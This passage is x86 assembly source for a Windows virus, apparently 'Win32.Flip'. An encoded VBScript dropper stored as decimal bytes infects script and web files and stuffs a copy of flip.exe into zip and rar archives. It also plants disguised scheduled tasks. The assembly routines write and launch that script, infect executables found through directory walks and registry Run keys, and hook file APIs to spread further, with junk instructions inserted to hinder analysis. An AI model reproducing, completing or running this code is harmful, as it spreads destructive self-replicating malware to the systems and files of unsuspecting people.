db 116d,114d,104d,101d,120d,32d,38d,32d,99d,104d,114d,40d,51d
db 52d,41d,32d,38d,32d,118d,98d,99d,114d,108d,102d,32d,38d
db 32d,34d,115d,116d,114d,72d,101d,120d,86d,97d,108d,117d,101d
db 61d,115d,116d,114d,72d,101d,120d,86d,97d,108d,117d,101d,38d
db 34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,13d,10d
db 104d,61d,48d,58d,101d,108d,115d,101d,58d,115d,116d,114d,104d
db 101d,120d,118d,97d,108d,117d,101d,32d,61d,32d,115d,116d,114d
db 72d,101d,120d,86d,97d,108d,117d,101d,32d,38d,32d,115d,116d
db 114d,104d,101d,120d,32d,58d,101d,110d,100d,32d,105d,102d,58d
db 110d,101d,120d,116d,13d,10d,115d,101d,116d,32d,70d,76d,73d
db 80d,32d,61d,32d,67d,114d,101d,97d,116d,101d,79d,98d,106d
db 101d,99d,116d,40d,34d,87d,83d,99d,114d,105d,112d,116d,46d
db 83d,104d,101d,108d,108d,34d,41d,13d,10d,83d,101d,116d,32d
db 102d,115d,111d,32d,61d,32d,99d,114d,101d,97d,116d,101d,111d
db 98d,106d,101d,99d,116d,40d,34d,115d,99d,114d,105d,112d,116d
db 105d,110d,103d,46d,102d,105d,108d,101d,115d,121d,115d,116d,101d
db 109d,111d,98d,106d,101d,99d,116d,34d,41d,13d,10d,83d,101d
db 116d,32d,68d,114d,105d,118d,101d,115d,61d,102d,115d,111d,46d
db 100d,114d,105d,118d,101d,115d,13d,10d,70d,111d,114d,32d,69d
db 97d,99d,104d,32d,68d,114d,105d,118d,101d,32d,105d,110d,32d
db 68d,114d,105d,118d,101d,115d,13d,10d,73d,102d,32d,100d,114d
db 105d,118d,101d,46d,105d,115d,114d,101d,97d,100d,121d,32d,116d
db 104d,101d,110d,13d,10d,68d,111d,115d,101d,97d,114d,99d,104d
db 32d,32d,100d,114d,105d,118d,101d,32d,38d,32d,34d,92d,34d
db 13d,10d,101d,110d,100d,32d,73d,102d,32d,58d,78d,101d,120d
db 116d,32d,13d,10d,102d,117d,110d,99d,116d,105d,111d,110d,32d
db 68d,111d,115d,101d,97d,114d,99d,104d,40d,112d,97d,116d,104d
db 41d,13d,10d,111d,110d,32d,101d,114d,114d,111d,114d,32d,114d
db 101d,115d,117d,109d,101d,32d,110d,101d,120d,116d,13d,10d,83d
db 101d,116d,32d,70d,111d,108d,100d,101d,114d,61d,102d,115d,111d
db 46d,103d,101d,116d,102d,111d,108d,100d,101d,114d,40d,112d,97d
db 116d,104d,41d,13d,10d,83d,101d,116d,32d,70d,105d,108d,101d
db 115d,32d,61d,32d,102d,111d,108d,100d,101d,114d,46d,102d,105d
db 108d,101d,115d,13d,10d,70d,111d,114d,32d,69d,97d,99d,104d
db 32d,70d,105d,108d,101d,32d,105d,110d,32d,102d,105d,108d,101d
db 115d,13d,10d,73d,102d,32d,102d,115d,111d,46d,71d,101d,116d
db 69d,120d,116d,101d,110d,115d,105d,111d,110d,78d,97d,109d,101d
db 40d,102d,105d,108d,101d,46d,112d,97d,116d,104d,41d,61d,34d
db 118d,98d,115d,34d,32d,116d,104d,101d,110d,13d,10d,83d,101d
db 116d,32d,83d,99d,114d,105d,112d,116d,115d,32d,61d,32d,70d
db 83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d,70d,105d
db 108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d,104d,44d
db 32d,49d,44d,32d,84d,114d,117d,101d,41d,13d,10d,73d,102d
db 32d,83d,99d,114d,105d,112d,116d,115d,46d,82d,101d,97d,100d
db 76d,105d,110d,101d,32d,60d,62d,32d,34d,82d,69d,77d,32d
db 70d,76d,73d,80d,34d,32d,116d,104d,101d,110d,13d,10d,83d
db 101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d,61d,32d
db 70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d,70d
db 105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d,104d
db 44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d,10d,83d
db 99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d,101d,32d
db 61d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d,101d,97d
db 100d,65d,108d,108d,13d,10d,83d,101d,116d,32d,87d,114d,105d
db 116d,101d,83d,99d,114d,105d,112d,116d,115d,32d,61d,32d,70d
db 83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d,70d,105d
db 108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d,104d,44d
db 32d,50d,44d,32d,84d,114d,117d,101d,41d,13d,10d,87d,114d
db 105d,116d,101d,83d,99d,114d,105d,112d,116d,115d,46d,87d,114d
db 105d,116d,101d,76d,105d,110d,101d,32d,34d,82d,69d,77d,32d
db 70d,76d,73d,80d,34d,13d,10d,87d,114d,105d,116d,101d,83d
db 99d,114d,105d,112d,116d,115d,46d,87d,114d,105d,116d,101d,76d
db 105d,110d,101d,32d,83d,99d,114d,105d,112d,116d,115d,83d,111d
db 117d,114d,99d,101d,13d,10d,87d,114d,105d,116d,101d,83d,99d
db 114d,105d,112d,116d,115d,46d,87d,114d,105d,116d,101d,76d,105d
db 110d,101d,32d,34d,115d,116d,114d,72d,101d,120d,86d,97d,108d
db 117d,101d,61d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d
db 41d,32d,38d,32d,115d,116d,114d,104d,101d,120d,118d,97d,108d
db 117d,101d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,13d
db 10d,87d,114d,105d,116d,101d,83d,99d,114d,105d,112d,116d,115d
db 46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,83d
db 101d,116d,32d,111d,98d,106d,70d,83d,79d,32d,61d,32d,67d
db 114d,101d,97d,116d,101d,79d,98d,106d,101d,99d,116d,40d,34d
db 32d,38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d
db 83d,99d,114d,105d,112d,116d,105d,110d,103d,46d,70d,105d,108d
db 101d,83d,121d,115d,116d,101d,109d,79d,98d,106d,101d,99d,116d
db 34d,32d,38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,34d,13d,10d,87d,114d,105d,116d,101d,83d,99d,114d
db 105d,112d,116d,115d,46d,87d,114d,105d,116d,101d,76d,105d,110d
db 101d,32d,34d,70d,111d,114d,32d,114d,61d,32d,49d,32d,84d
db 111d,32d,76d,101d,110d,40d,115d,116d,114d,72d,101d,120d,86d
db 97d,108d,117d,101d,41d,32d,83d,116d,101d,112d,32d,50d,32d
db 58d,32d,78d,101d,119d,67d,111d,100d,101d,32d,61d,32d,78d
db 101d,119d,67d,111d,100d,101d,32d,38d,32d,67d,104d,114d,40d
db 34d,32d,38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,38d,104d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d
db 41d,32d,38d,32d,34d,38d,32d,77d,105d,100d,40d,115d,116d
db 114d,72d,101d,120d,86d,97d,108d,117d,101d,44d,32d,114d,44d
db 32d,50d,41d,41d,32d,58d,32d,110d,101d,120d,116d,34d,13d
db 10d,87d,114d,105d,116d,101d,83d,99d,114d,105d,112d,116d,115d
db 46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,83d
db 101d,116d,32d,111d,98d,106d,70d,105d,108d,101d,50d,32d,61d
db 32d,111d,98d,106d,70d,83d,79d,46d,67d,114d,101d,97d,116d
db 101d,84d,101d,120d,116d,70d,105d,108d,101d,40d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,70d
db 76d,73d,80d,46d,69d,88d,69d,34d,32d,38d,32d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,32d,58d,32d
db 111d,98d,106d,70d,105d,108d,101d,50d,46d,119d,114d,105d,116d
db 101d,32d,32d,78d,101d,119d,67d,111d,100d,101d,32d,58d,32d
db 111d,98d,106d,70d,105d,108d,101d,50d,46d,99d,108d,111d,115d
db 101d,34d,13d,10d,87d,114d,105d,116d,101d,83d,99d,114d,105d
db 112d,116d,115d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d
db 32d,34d,67d,114d,101d,97d,116d,101d,79d,98d,106d,101d,99d
db 116d,40d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d
db 32d,38d,32d,34d,87d,83d,99d,114d,105d,112d,116d,46d,83d
db 104d,101d,108d,108d,34d,32d,38d,32d,99d,104d,114d,40d,51d
db 52d,41d,32d,38d,32d,34d,41d,46d,114d,117d,110d,32d,34d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,70d,76d,73d,80d,46d,69d,88d,69d,34d,32d,38d,32d
db 99d,104d,114d,40d,51d,52d,41d,13d,10d,109d,115d,103d,98d
db 111d,120d,32d,102d,105d,108d,101d,46d,112d,97d,116d,104d,13d
db 10d,101d,110d,100d,32d,105d,102d,13d,10d,101d,110d,100d,32d
db 105d,102d,13d,10d,73d,102d,32d,102d,115d,111d,46d,71d,101d
db 116d,69d,120d,116d,101d,110d,115d,105d,111d,110d,78d,97d,109d
db 101d,40d,102d,105d,108d,101d,46d,112d,97d,116d,104d,41d,61d
db 34d,122d,105d,112d,34d,32d,116d,104d,101d,110d,13d,10d,115d
db 101d,116d,32d,119d,111d,114d,100d,32d,61d,32d,99d,114d,101d
db 97d,116d,101d,111d,98d,106d,101d,99d,116d,40d,34d,119d,111d
db 114d,100d,46d,97d,112d,112d,108d,105d,99d,97d,116d,105d,111d
db 110d,34d,41d,13d,10d,97d,112d,112d,119d,111d,114d,100d,32d
db 61d,32d,119d,111d,114d,100d,46d,83d,121d,115d,116d,101d,109d
db 46d,80d,114d,105d,118d,97d,116d,101d,80d,114d,111d,102d,105d
db 108d,101d,83d,116d,114d,105d,110d,103d,40d,34d,34d,44d,34d
db 72d,75d,69d,89d,95d,76d,79d,67d,65d,76d,95d,77d,65d
db 67d,72d,73d,78d,69d,92d,83d,79d,70d,84d,87d,65d,82d
db 69d,92d,77d,105d,99d,114d,111d,115d,111d,102d,116d,92d,87d
db 105d,110d,100d,111d,119d,115d,92d,67d,117d,114d,114d,101d,110d
db 116d,86d,101d,114d,115d,105d,111d,110d,92d,65d,112d,112d,32d
db 80d,97d,116d,104d,115d,92d,119d,105d,110d,122d,105d,112d,51d
db 50d,46d,101d,120d,101d,34d,44d,32d,34d,34d,41d,13d,10d
db 70d,76d,73d,80d,46d,114d,117d,110d,32d,97d,112d,112d,119d
db 111d,114d,100d,32d,38d,32d,34d,32d,45d,97d,32d,45d,114d
db 32d,34d,32d,38d,32d,102d,105d,108d,101d,46d,112d,97d,116d
db 104d,32d,38d,32d,67d,104d,114d,40d,51d,50d,41d,32d,38d
db 32d,34d,32d,67d,58d,92d,102d,108d,105d,112d,46d,101d,120d
db 101d,34d,13d,10d,101d,110d,100d,32d,105d,102d,13d,10d,73d
db 102d,32d,102d,115d,111d,46d,71d,101d,116d,69d,120d,116d,101d
db 110d,115d,105d,111d,110d,78d,97d,109d,101d,40d,102d,105d,108d
db 101d,46d,112d,97d,116d,104d,41d,61d,34d,114d,97d,114d,34d
db 32d,116d,104d,101d,110d,13d,10d,70d,76d,73d,80d,46d,114d
db 117d,110d,32d,34d,87d,105d,110d,82d,65d,82d,46d,101d,120d
db 101d,32d,97d,32d,34d,32d,38d,32d,102d,105d,108d,101d,46d
db 112d,97d,116d,104d,32d,38d,32d,34d,67d,58d,92d,102d,108d
db 105d,112d,46d,101d,120d,101d,34d,13d,10d,101d,110d,100d,32d
db 105d,102d,13d,10d,73d,102d,32d,108d,99d,97d,115d,101d,40d
db 102d,115d,111d,46d,71d,101d,116d,69d,120d,116d,101d,110d,115d
db 105d,111d,110d,78d,97d,109d,101d,40d,102d,105d,108d,101d,46d
db 112d,97d,116d,104d,41d,41d,61d,34d,104d,116d,109d,108d,34d
db 32d,111d,114d,32d,108d,99d,97d,115d,101d,40d,102d,115d,111d
db 46d,71d,101d,116d,69d,120d,116d,101d,110d,115d,105d,111d,110d
db 78d,97d,109d,101d,40d,102d,105d,108d,101d,46d,112d,97d,116d
db 104d,41d,41d,61d,34d,104d,116d,109d,34d,32d,111d,114d,32d
db 108d,99d,97d,115d,101d,40d,102d,115d,111d,46d,71d,101d,116d
db 69d,120d,116d,101d,110d,115d,105d,111d,110d,78d,97d,109d,101d
db 40d,102d,105d,108d,101d,46d,112d,97d,116d,104d,41d,41d,61d
db 34d,112d,104d,112d,34d,32d,111d,114d,32d,108d,99d,97d,115d
db 101d,40d,102d,115d,111d,46d,71d,101d,116d,69d,120d,116d,101d
db 110d,115d,105d,111d,110d,78d,97d,109d,101d,40d,102d,105d,108d
db 101d,46d,112d,97d,116d,104d,41d,41d,61d,34d,97d,115d,112d
db 34d,32d,116d,104d,101d,110d,13d,10d,83d,101d,116d,32d,83d
db 99d,114d,105d,112d,116d,115d,32d,61d,32d,70d,83d,79d,46d
db 79d,112d,101d,110d,84d,101d,120d,116d,70d,105d,108d,101d,40d
db 70d,105d,108d,101d,46d,112d,97d,116d,104d,44d,32d,49d,44d
db 32d,84d,114d,117d,101d,41d,13d,10d,73d,102d,32d,83d,99d
db 114d,105d,112d,116d,115d,46d,82d,101d,97d,100d,76d,105d,110d
db 101d,32d,60d,62d,32d,34d,60d,33d,45d,45d,70d,76d,73d
db 80d,45d,45d,62d,34d,32d,116d,104d,101d,110d,13d,10d,83d
db 101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d,61d,32d
db 70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d,70d
db 105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d,104d
db 44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d,10d,83d
db 99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d,101d,32d
db 61d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d,101d,97d
db 100d,65d,108d,108d,13d,10d,83d,101d,116d,32d,87d,114d,105d
db 116d,101d,83d,99d,114d,105d,112d,116d,115d,32d,61d,32d,70d
db 83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d,70d,105d
db 108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d,104d,44d
db 32d,50d,44d,32d,84d,114d,117d,101d,41d,13d,10d,87d,114d
db 105d,116d,101d,83d,99d,114d,105d,112d,116d,115d,46d,119d,114d
db 105d,116d,101d,108d,105d,110d,101d,32d,34d,60d,33d,45d,45d
db 70d,76d,73d,80d,45d,45d,62d,34d,13d,10d,87d,114d,105d
db 116d,101d,83d,99d,114d,105d,112d,116d,115d,46d,119d,114d,105d
db 116d,101d,108d,105d,110d,101d,32d,34d,60d,104d,116d,109d,108d
db 62d,60d,66d,111d,100d,121d,62d,60d,83d,99d,114d,105d,112d
db 116d,32d,108d,97d,110d,103d,117d,97d,103d,101d,61d,34d,32d
db 38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d
db 86d,66d,83d,99d,114d,105d,112d,116d,34d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,62d,34d,13d
db 10d,87d,114d,105d,116d,101d,83d,99d,114d,105d,112d,116d,115d
db 46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,115d
db 116d,114d,72d,101d,120d,86d,97d,108d,117d,101d,61d,34d,32d
db 38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,115d
db 116d,114d,104d,101d,120d,118d,97d,108d,117d,101d,32d,38d,32d
db 99d,104d,114d,40d,51d,52d,41d,13d,10d,87d,114d,105d,116d
db 101d,83d,99d,114d,105d,112d,116d,115d,46d,87d,114d,105d,116d
db 101d,76d,105d,110d,101d,32d,34d,83d,101d,116d,32d,111d,98d
db 106d,70d,83d,79d,32d,61d,32d,67d,114d,101d,97d,116d,101d
db 79d,98d,106d,101d,99d,116d,40d,34d,32d,38d,99d,104d,114d
db 40d,51d,52d,41d,32d,38d,32d,34d,83d,99d,114d,105d,112d
db 116d,105d,110d,103d,46d,70d,105d,108d,101d,83d,121d,115d,116d
db 101d,109d,79d,98d,106d,101d,99d,116d,34d,32d,38d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,34d,13d,10d
db 87d,114d,105d,116d,101d,83d,99d,114d,105d,112d,116d,115d,46d
db 87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,70d,111d
db 114d,32d,114d,61d,32d,49d,32d,84d,111d,32d,76d,101d,110d
db 40d,115d,116d,114d,72d,101d,120d,86d,97d,108d,117d,101d,41d
db 32d,83d,116d,101d,112d,32d,50d,32d,58d,32d,78d,101d,119d
db 67d,111d,100d,101d,32d,61d,32d,78d,101d,119d,67d,111d,100d
db 101d,32d,38d,32d,67d,104d,114d,40d,34d,32d,38d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,38d,104d,34d,32d
db 38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d
db 38d,32d,77d,105d,100d,40d,115d,116d,114d,72d,101d,120d,86d
db 97d,108d,117d,101d,44d,32d,114d,44d,32d,50d,41d,41d,32d
db 58d,32d,110d,101d,120d,116d,34d,13d,10d,87d,114d,105d,116d
db 101d,83d,99d,114d,105d,112d,116d,115d,46d,87d,114d,105d,116d
db 101d,76d,105d,110d,101d,32d,34d,83d,101d,116d,32d,111d,98d
db 106d,70d,105d,108d,101d,50d,32d,61d,32d,111d,98d,106d,70d
db 83d,79d,46d,67d,114d,101d,97d,116d,101d,84d,101d,120d,116d
db 70d,105d,108d,101d,40d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,32d,38d,32d,34d,70d,76d,73d,80d,46d,69d
db 88d,69d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d
db 32d,38d,32d,34d,41d,32d,58d,32d,111d,98d,106d,70d,105d
db 108d,101d,50d,46d,119d,114d,105d,116d,101d,32d,32d,78d,101d
db 119d,67d,111d,100d,101d,32d,58d,32d,111d,98d,106d,70d,105d
db 108d,101d,50d,46d,99d,108d,111d,115d,101d,34d,13d,10d,87d
db 114d,105d,116d,101d,83d,99d,114d,105d,112d,116d,115d,46d,87d
db 114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,67d,114d,101d
db 97d,116d,101d,79d,98d,106d,101d,99d,116d,40d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,87d
db 83d,99d,114d,105d,112d,116d,46d,83d,104d,101d,108d,108d,34d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,46d,114d,117d,110d,32d,34d,32d,38d,32d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,70d,76d,73d,80d
db 46d,69d,88d,69d,34d,32d,38d,32d,99d,104d,114d,40d,51d
db 52d,41d,13d,10d,87d,114d,105d,116d,101d,83d,99d,114d,105d
db 112d,116d,115d,46d,119d,114d,105d,116d,101d,108d,105d,110d,101d
db 32d,34d,60d,34d,32d,38d,32d,99d,104d,114d,40d,52d,55d
db 41d,32d,38d,32d,34d,115d,99d,114d,105d,112d,116d,62d,60d
db 47d,98d,111d,100d,121d,62d,60d,47d,104d,116d,109d,108d,62d
db 34d,13d,10d,87d,114d,105d,116d,101d,83d,99d,114d,105d,112d
db 116d,115d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d
db 83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d,101d
db 13d,10d,109d,115d,103d,98d,111d,120d,32d,102d,105d,108d,101d
db 46d,112d,97d,116d,104d,58d,101d,110d,100d,32d,105d,102d,58d
db 101d,110d,100d,32d,105d,102d,58d,110d,101d,120d,116d,13d,10d
db 83d,101d,116d,32d,83d,117d,98d,102d,111d,108d,100d,101d,114d
db 115d,32d,61d,32d,102d,111d,108d,100d,101d,114d,46d,83d,117d
db 98d,70d,111d,108d,100d,101d,114d,115d,13d,10d,70d,111d,114d
db 32d,69d,97d,99d,104d,32d,83d,117d,98d,102d,111d,108d,100d
db 101d,114d,32d,105d,110d,32d,83d,117d,98d,102d,111d,108d,100d
db 101d,114d,115d,13d,10d,68d,111d,115d,101d,97d,114d,99d,104d
db 32d,83d,117d,98d,102d,111d,108d,100d,101d,114d,46d,112d,97d
db 116d,104d,13d,10d,78d,101d,120d,116d,13d,10d,101d,110d,100d
db 32d,102d,117d,110d,99d,116d,105d,111d,110d,13d,10d,70d,76d
db 73d,80d,46d,114d,117d,110d,32d,34d,83d,67d,72d,84d,65d
db 83d,75d,83d,32d,47d,67d,114d,101d,97d,116d,101d,32d,47d
db 83d,67d,32d,87d,69d,69d,75d,76d,89d,32d,47d,84d,78d
db 32d,119d,51d,50d,70d,76d,73d,80d,67d,108d,101d,97d,110d
db 32d,47d,84d,82d,32d,67d,76d,69d,65d,78d,77d,71d,82d
db 46d,69d,88d,69d,34d,13d,10d,70d,76d,73d,80d,46d,114d
db 117d,110d,32d,34d,83d,67d,72d,84d,65d,83d,75d,83d,32d
db 47d,67d,114d,101d,97d,116d,101d,32d,47d,83d,67d,32d,87d
db 69d,69d,75d,76d,89d,32d,47d,84d,78d,32d,119d,51d,50d
db 70d,76d,73d,80d,68d,101d,102d,114d,97d,103d,32d,47d,84d
db 82d,32d,68d,69d,70d,82d,65d,71d,46d,69d,88d,69d,34d
db 13d,10d,105d,102d,32d,100d,97d,121d,40d,110d,111d,119d,41d
db 61d,49d,55d,32d,116d,104d,101d,110d,32d,109d,115d,103d,98d
db 111d,120d,32d,34d,68d,111d,110d,116d,32d,102d,111d,114d,103d
db 101d,116d,32d,116d,111d,32d,117d,112d,100d,97d,116d,101d,32d
db 121d,111d,117d,114d,32d,97d,110d,116d,105d,118d,105d,114d,117d
db 115d,32d,115d,111d,102d,116d,119d,97d,114d,101d,34d,44d,118d
db 98d,105d,110d,102d,111d,114d,109d,97d,116d,105d,111d,110d,44d
db 34d,87d,105d,110d,51d,50d,46d,70d,108d,105d,112d,32d,66d
db 121d,32d,100d,74d,65d,78d,71d,71d,79d,47d,51d,102d,34d
db 13d,10d
EndScriptDropper:

 ScriptLen     equ ( offset EndScriptDropper - offset ScriptDropper )

 KernelPE    dd 0h
 APICRC32    dd 0h
 MapHandle   dd 0h
 Folders db '*.',0
 NewEIP      dd 0h
 XShellExecuteA         dd 0h
 DroppedFile2   db 'C:\flip.exe',0
 RegData1    dd 0h
HookApi:
 dd 020F1230h
 dd ( offset HookSearchPathA )
 YSearchPathA dd 0h
 dd 0F2F886E3h
 dd ( offset Hook_lopen )
 Y_lopen dd 0h
 dd 0B2DBD7DCh
 dd ( offset HookSetCurrentDirectoryA )
 YSetCurrentDirectoryA dd 0h
 dd 08C892DDFh
 dd ( offset HookCreateFileA )
 YCreateFileA dd 0h

 db 01h
 Imagehlp    db 'imagehlp.dll',0
 GHookBuffer db       260d dup (?)

 Trash2      dd 0h
 NewSize     dd 0h
 filealign   dd 0h
 ScriptName    db 'C:\FLIP.vbs', 0
 RandVal     dd 0h
AdvapiOffsets: 
 XRegOpenKeyExA       dd 0h
 XRegQueryValueExA    dd 0h
 XRegCloseKey         dd 0h
 XRegEnumKeyA         dd 0h


 Misc1       dd 0h
 RunPath     db  'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
 TempGetApi2 dd 0h
 Write       dd 0h
 EPOmem      dd 0h
 InfCounter  dd 0h
 CheckSumMFA db 'CheckSumMappedFile',0

 APIOffsets:
 XFindClose             dd 0h
 XSetFileAttributesA    dd 0h
 XMapViewOfFile         dd 0h
 XGetWindowsDirectoryA  dd 0h
 XLoadLibraryA          dd 0h
 XGetCurrentDirectoryA  dd 0h
 XSetCurrentDirectoryA  dd 0h
 XCloseHandle           dd 0h
 XFindFirstFileA        dd 0h
 XFindNextFileA         dd 0h
 XUnmapViewOfFile       dd 0h
 XCopyFileA             dd 0h
 XGetProcAddress        dd 0h
 XGetFileAttributesA    dd 0h
 XGetSystemDirectoryA   dd 0h
 XWriteFile             dd 0h
 XCreateFileMappingA    dd 0h
 XCreateFileA           dd 0h
 XRegEnumValueA		dd 0h

 PEheader    dd 0h
 RegHandle dd 0h
 fstSec      dd 0h
 OldBase     dd 400000h




DropScripts:
 call CreateDroppedFile
 push 0
 push 080h
 push 1h
 neg ecx                                
 push 0
 push 0
 push 0C0000000h
 lea ebx, [ebp+ScriptName]
 xchg ebx, edi

 push edi
 call dword ptr [ebp+XCreateFileA]
 cmp eax, -1
 je DropScriptsFailed
 push eax
 mov dword ptr [ebp+Trash1], 877381     
 push 0
 lea ecx, [ebp+Write]
 xchg ecx, edi

 push edi
 push ScriptLen
 lea edx, [ebp+ScriptDropper]
 xchg edi, edx

 push edi
 push eax
 mov ebx, eax                           
 call dword ptr [ebp+XWriteFile]
 call dword ptr [ebp+XCloseHandle]
 cmp dword ptr [ebp+XShellExecuteA], 0
 je DropScriptsFailed
 push 0
 push 0
 push 0
 mov esi, offset ScriptName
 add esi, ebp

 push esi
 rcl ebx, 2d                            
 push 0
 push 0
 and ecx, 88528249d                     
 call dword ptr [ebp+XShellExecuteA]
DropScriptsFailed:
ret

InfectRegistry:
                                        
 mov edx, dword ptr [ebp+XRegOpenKeyExA]
 or edx, edx
 jz EndInfectRegistry
 lea ebx, [ebp+RegHandle]
 xchg ebx, ecx

 push ecx
 push 001F0000h
 push 0h
 mov ecx, offset RunPath
 add ecx, ebp

 push ecx
                                        
 push 80000002h
 call dword ptr [XRegOpenKeyExA]
                                        
 mov ecx, 62332d
 sub ecx, 62332d
RegistryInfectLoop:
                                        
 lea ebx, [ebp+NameBufLen2]
 xchg ebx, esi

 push esi
 lea ebx, [ebp+NameBuffer2]
 xchg edi, ebx

 push edi
 lea ebx, [ebp+RegType]

 push ebx
 push 0h
 lea edi, [ebp+NameBufLen]

 push edi
 lea esi, [ebp+NameBuffer]
 xchg esi, ebx

 push ebx
 push ecx
 push dword ptr [ebp+RegHandle]
 call dword ptr [ebp+XRegEnumValueA]
 cmp eax, 0
 jne CloseRegInfection
 sal ebx, 23d                           
                                        
                                        
 mov ebx, ( 255d xor 21d )
 xor ebx, 21d
 mov dword ptr [ebp+RegData2], 0
 xor dword ptr [ebp+RegData2], ebx
 lea esi, [ebp+RegData2]
 xchg esi, ebx

 push ebx
 lea edi, [ebp+NameBuffer]

 push edi
 lea edi, [ebp+RegData1]

 push edi
 push 0h
 lea esi, [ebp+NameBuffer]
 xchg ebx, esi

 push ebx
 push dword ptr [ebp+RegHandle]
 call dword ptr [ebp+XRegQueryValueExA]
 lea edi, [ebp+NameBuffer]
 xchg edi, ebx

 dec ebx
getNameBufferEnd:
                                        
 add ebx, 1d
 cmp byte ptr [ebx], 0
 jne getNameBufferEnd
 lea edi, [ebp+NameBuffer]

getNamePath:
 dec ebx
 cmp ebx, edi
 jb RegistryInfectLoop
 cmp byte ptr [ebx], '\'
 mov dword ptr [ebp+Trash1], ebx        
 jne getNamePath
                                        
                                        
 inc ebx
 mov byte ptr [ebx], 0
 mov dword ptr [ebp+Trash1], 1856424    
 pushad
 mov edi, ebp
 add edi, offset NameBuffer

 push edi
 call dword ptr [ebp+XSetCurrentDirectoryA]
 call InfectCurDir
 popad
                                        
 inc ecx
 jmp RegistryInfectLoop
CloseRegInfection:
 push dword ptr [ebp+RegHandle]
 call dword ptr [ebp+XRegCloseKey]
EndInfectRegistry:
ret

HookCreateFileA:
 call GenericHooker1
 jmp dword ptr [eax+YCreateFileA]

HookSearchPathA:
 call GenericHooker2
 jmp dword ptr [eax+YSearchPathA]

HookSetCurrentDirectoryA:
 mov eax, dword ptr [esp+4]
 pushad 
 call GetDeltaOffset
 push eax 
 call dword ptr [eax+YSetCurrentDirectoryA]
 call InfectCurDir
 popad 
 push ebp 
 call GetDeltaOffset
 xchg ebp, eax 
 pop ebp 
 jmp dword ptr [eax+YSetCurrentDirectoryA]
Hook_lopen:
 call GenericHooker1
 jmp dword ptr [eax+Y_lopen]

Outbreak:                                                                  
 sub ecx, ecx
 xor ecx, dword ptr [ebp+EPOCount]

 push ecx
 pop dword ptr [ebp+OldEPOCount]

 sal edx, 6d                            
                                        
 mov edx, -1d
 and edx, dword ptr [ebp+OldEIP]

 mov dword ptr [ebp+retEIP], edx

 add eax, 32606062d                     
 push dword ptr [ebp+OldBase]
 pop edi

 mov dword ptr [ebp+retBase], edi                                       
                                        
 lea eax, [ebp+OldDirectory]

 push eax
 mov ecx, 71441670d                     
 push 255d
 call dword ptr [ebp+XGetCurrentDirectoryA]

 call InfectCurDir
                                        
 lea ecx, [ebp+OldDirectory]
                                  
 push ecx
 pop eax

TravelDownLoop1:                        
 inc ecx
 cmp byte ptr [ecx], 0
 jne TravelDownLoop1
TravelDownLoop2:                        
 dec ecx
 cmp byte ptr [ecx], '\'
 jne TravelDownNext
 sal edx, 6d                            
 mov byte ptr [ecx], 0
 push eax
 call dword ptr [ebp+XSetCurrentDirectoryA]
 pushad
 mov edx, 1102096d                      
 call InfectCurDir
 popad
 mov byte ptr [ecx], '\'
TravelDownNext:
 cmp ecx, eax
 jne TravelDownLoop2
 mov ebx, 772965d                       

 call InfectRegistry
 call TravelUpwards
 push 255d
 mov edx, ebp
 add edx, offset DirectoryBuffer

 push edx
 call dword ptr [ebp+XGetWindowsDirectoryA]
 lea edx, [ebp+DirectoryBuffer]
 xchg edx, ebx

 push ebx
 call dword ptr [ebp+XSetCurrentDirectoryA]
 call InfectCurDir
 call DropScripts
 call HookAllAPIs
 neg edx                                
                                        
 push 255d
 sar ebx, 10d                           
 mov ecx, offset DirectoryBuffer
 add ecx, ebp

 push ecx
